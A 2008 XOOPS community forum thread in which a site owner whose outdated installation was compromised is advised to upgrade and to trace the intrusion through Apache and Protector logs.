xoops forums

limecity

Friend of XOOPS
Posted on: 2008/12/23 13:06
limecity
limecity (Show more)
Friend of XOOPS
Posts: 1602
Since: 2003/7/6 0
#1

User account hacked 2.0.18.1

one of my unupgraded site got hacked
using XOOPS 2.0.18.1

I have no idea how.
but the hacker has been using existing user accounts to post nonsense stuff.

what should I do now?

I have the protector version running for 2.0.18.1 .
http://www.mounthiking.com
all your hiking gears and gadgets

abinsblaue

Just popping in
Posted on: 2008/12/23 13:28
abinsblaue
abinsblaue (Show more)
Just popping in
Posts: 27
Since: 2008/10/15
#2

Re: User account hacked 2.0.18.1

upgrade to xoops-2.0.18.2 or XOOPS 2.3.2 ...

limecity

Friend of XOOPS
Posted on: 2008/12/23 13:42
limecity
limecity (Show more)
Friend of XOOPS
Posts: 1602
Since: 2003/7/6 0
#3

Re: User account hacked 2.0.18.1

is it advisable to upgrade at this point ?

like I should install a antivirus when the virus is in the bootsector or something?

please advice. thanks
http://www.mounthiking.com
all your hiking gears and gadgets

ghia

Community Support Member
Posted on: 2008/12/23 16:39
ghia
ghia (Show more)
Community Support Member
Posts: 4954
Since: 2008/7/3 1
#4

Re: User account hacked 2.0.18.1

Quote:
is it advisable to upgrade at this point ?

Before you can answer this question, you need to find out in which way the hacker has found access to your site.
If eg he found a security hole in a module, then it will not help you to upgrade XOOPS. If he found access to your site trough some malware on the PC, you are using to manage the site, it is obvious that you have to cure on your local PC.
Normal, you can say the more up to date the modules and XOOPS are, the better (altough in the new 2.3.x series heve been found two additional security holes during the last months).
At least go to 2.0.18.2, which is a less impacting upgrade then 2.3.2b and check your modules (at least Protector) for the latest versions.

To find out how the hacker has breach the system security, you have to examine the log files of Apache.
Start eg with the posting time of a spam message.
Follow the trail by using the IP number and browser ID. If a user id is known follow also the same trails for requests where this id was used.
Look also in the Protector log for incidents and use the IP and time to trail other requests.

By examining unusual (eg with a http address other then your server) or suspicious requests or unusual request patterns (eg no image requests), you can maybe find out which module was targeted and in which way database and user information was leaked.
Check also the byte count of the data transferred to the browser. Compare this count with legitimate requests.

If the hackers IP is not from a country, where you expect users or traffic from, block their net with .htaccess.